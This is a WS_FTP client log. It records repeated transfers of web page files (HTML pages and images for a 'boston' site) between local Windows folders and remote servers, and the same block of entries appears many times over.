10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
